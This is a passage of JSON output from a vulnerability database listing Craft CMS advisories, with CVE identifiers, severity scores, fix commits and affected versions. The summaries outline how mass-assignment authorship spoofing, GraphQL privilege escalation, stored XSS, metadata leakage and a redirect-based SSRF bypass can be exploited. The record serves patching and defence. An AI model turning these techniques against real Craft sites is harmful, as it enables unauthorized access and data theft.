ility":"VCID-7y4f-ef7t-47eb"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-dbcz-erbe-u7dt"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-esma-wxje-eqh3"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-h6t5-pdp5-8qhe"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rb7c-3nkc-gkeg"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-vvhc-rnpr-ubey"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.7.5"}],"aliases":["CVE-2025-35939","GHSA-7vrx-9684-xrf2"],"risk_score":10.0,"exploitability":"2.0","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jxet-d8ux-mkge"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50633?format=json","vulnerability_id":"VCID-jxz8-g6fq-dubw","summary":"Craft CMS: Entries Authorship Spoofing via Mass Assignment\nThe entry creation process allows for **Mass Assignment** of the `authorId` attribute. A user with \"Create Entries\" permission can inject the `authorIds[]` (or `authorId`) parameter into the POST request, which the backend processes without verifying if the current user is authorized to assign authorship to others.\n\nNormally, this field is not present in the request for users without the necessary permissions. By manually adding this parameter, an attacker can attribute the new entry to any user, including Admins. This effectively \"spoofs\" the authorship.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28781","reference_id":"","reference_type":"","scores":[{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.16153","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28781"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/830b403870cd784b47ae42a3f5a16e7ac2d7f5a8","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-04T17:36:36Z/"}],"url":"https://github.com/craftcms/cms/commit/830b403870cd784b47ae42a3f5a16e7ac2d7f5a8"},{"reference_url":"https://github.com/craftcms/cms/commit/c6dcbdffaf6ab3ffe77d317336684d83699f4542","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-04T17:36:36Z/"}],"url":"https://github.com/craftcms/cms/commit/c6dcbdffaf6ab3ffe77d317336684d83699f4542"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28781","reference_id":"CVE-2026-28781","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28781"},{"reference_url":"https://github.com/advisories/GHSA-2xfc-g69j-x2mp","reference_id":"GHSA-2xfc-g69j-x2mp","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2xfc-g69j-x2mp"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-2xfc-g69j-x2mp","reference_id":"GHSA-2xfc-g69j-x2mp","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-04T17:36:36Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-2xfc-g69j-x2mp"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73953?format=json","purl":"pkg:composer/craftcms/cms@4.17.0-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.17.0-beta.1"},{"url":"http://public2.vulnerablecode.io/api/packages/73952?format=json","purl":"pkg:composer/craftcms/cms@5.9.0-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-6ban-jvfq-w3at"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.0-beta.1"}],"aliases":["CVE-2026-28781","GHSA-2xfc-g69j-x2mp"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jxz8-g6fq-dubw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50075?format=json","vulnerability_id":"VCID-kbrc-85av-nfcn","summary":"Craft CMS: GraphQL Asset Mutation Privilege Escalation\nType: Privilege Escalation (CWE-269)\nAffected: Craft CMS 5.x (likely affects 4.x and 3.x as well)\nLocation: `src/gql/resolvers/mutations/Asset.php lines 57-107`","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25497","reference_id":"","reference_type":"","scores":[{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.06198","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25497"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/ac7edf868c1a81fd9c4dc49d3b3edf1cce113409","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:30:18Z/"}],"url":"https://github.com/craftcms/cms/commit/ac7edf868c1a81fd9c4dc49d3b3edf1cce113409"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/4.17.0-beta.1","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/releases/tag/4.17.0-beta.1"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/5.8.22","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:30:18Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/5.8.22"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/5.9.0-beta.1","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/releases/tag/5.9.0-beta.1"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25497","reference_id":"CVE-2026-25497","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25497"},{"reference_url":"https://github.com/advisories/GHSA-fxp3-g6gw-4r4v","reference_id":"GHSA-fxp3-g6gw-4r4v","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-fxp3-g6gw-4r4v"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-fxp3-g6gw-4r4v","reference_id":"GHSA-fxp3-g6gw-4r4v","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:30:18Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-fxp3-g6gw-4r4v"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73953?format=json","purl":"pkg:composer/craftcms/cms@4.17.0-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.17.0-beta.1"},{"url":"http://public2.vulnerablecode.io/api/packages/73952?format=json","purl":"pkg:composer/craftcms/cms@5.9.0-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-6ban-jvfq-w3at"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.0-beta.1"}],"aliases":["CVE-2026-25497","GHSA-fxp3-g6gw-4r4v"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-kbrc-85av-nfcn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50612?format=json","vulnerability_id":"VCID-m5rf-usae-yfb7","summary":"Craft CMS Vulnerable to Stored XSS in Settings Names and Field Options\nStored XSS in multiple settings. Names/labels are rendered without sanitization via `checkbox.twig` template which uses `{{ label|raw }}`.\n\n---","references":[{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/67780a778c6ec04e68e64a0b1177c168306144a2","reference_id":"","reference_type":"","scores":[{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/commit/67780a778c6ec04e68e64a0b1177c168306144a2"},{"reference_url":"https://github.com/craftcms/cms/commit/943152d2246b36f12adf161a03b8695b773d9276","reference_id":"","reference_type":"","scores":[{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/commit/943152d2246b36f12adf161a03b8695b773d9276"},{"reference_url":"https://github.com/advisories/GHSA-4mgv-366x-qxvx","reference_id":"GHSA-4mgv-366x-qxvx","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4mgv-366x-qxvx"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-4mgv-366x-qxvx","reference_id":"GHSA-4mgv-366x-qxvx","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-4mgv-366x-qxvx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73953?format=json","purl":"pkg:composer/craftcms/cms@4.17.0-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.17.0-beta.1"},{"url":"http://public2.vulnerablecode.io/api/packages/73952?format=json","purl":"pkg:composer/craftcms/cms@5.9.0-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-6ban-jvfq-w3at"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.0-beta.1"}],"aliases":["GHSA-4mgv-366x-qxvx"],"risk_score":1.4,"exploitability":"0.5","weighted_severity":"2.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-m5rf-usae-yfb7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91453?format=json","vulnerability_id":"VCID-nmzu-mefv-tqeh","summary":"Craft CMS' anonymous \"assets/image-editor\" calls return private asset editor metadata to unauthorized users\n### Summary\n\nA low-privileged authenticated user can call `assets/image-editor` with the ID of a private asset they cannot view and still receive editor response data, including `focalPoint`.\n\nThe endpoint returns private editing metadata without per-asset authorization validation.\n\nRoot-cause analysis:\n\n1. `actionImageEditor()` accepts `assetId` from the request body.\n2. The asset is loaded, and the focal-point data is read.\n3. Response returns `html` and `focalPoint`.\n4. No explicit authorization check is applied before the response.\n\n### Impact\n\n## Affected deployments:\n\n* Craft sites where asset edit metadata should remain restricted to authorized users.\n\n## Security consequence:\n\n* Unauthorized users can extract private editor metadata and related editor context for inaccessible assets.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33161","reference_id":"","reference_type":"","scores":[{"value":"0.00042","scoring_system":"epss","scoring_elements":"0.1307","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33161"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"1.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/d30df3112220db1ffd6726a3ed11857014c7fb27","reference_id":"","reference_type":"","scores":[{"value":"1.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-24T18:01:51Z/"}],"url":"https://github.com/craftcms/cms/commit/d30df3112220db1ffd6726a3ed11857014c7fb27"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/4.17.8","reference_id":"","reference_type":"","scores":[{"value":"1.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-24T18:01:51Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/4.17.8"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/5.9.14","reference_id":"","reference_type":"","scores":[{"value":"1.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-24T18:01:51Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/5.9.14"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-vgjg-248p-rfm2","reference_id":"","reference_type":"","scores":[{"value":"1.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-24T18:01:51Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-vgjg-248p-rfm2"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33161","reference_id":"","reference_type":"","scores":[{"value":"1.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33161"},{"reference_url":"https://github.com/advisories/GHSA-vgjg-248p-rfm2","reference_id":"GHSA-vgjg-248p-rfm2","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-vgjg-248p-rfm2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/113239?format=json","purl":"pkg:composer/craftcms/cms@4.17.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-gzry-xtu5-ukhu"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.17.8"},{"url":"http://public2.vulnerablecode.io/api/packages/113238?format=json","purl":"pkg:composer/craftcms/cms@5.9.14","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-gzry-xtu5-ukhu"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.14"}],"aliases":["CVE-2026-33161","GHSA-vgjg-248p-rfm2"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-nmzu-mefv-tqeh"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50080?format=json","vulnerability_id":"VCID-ppet-ruae-1kav","summary":"Craft CMS Vulnerable to SSRF in GraphQL Asset Mutation via HTTP Redirect\nThe `saveAsset` GraphQL mutation validates the initial URL hostname and resolved IP against a blocklist, but Guzzle follows HTTP redirects by default. An attacker can bypass all SSRF protections by hosting a redirect that points to cloud metadata endpoints or any internal IP 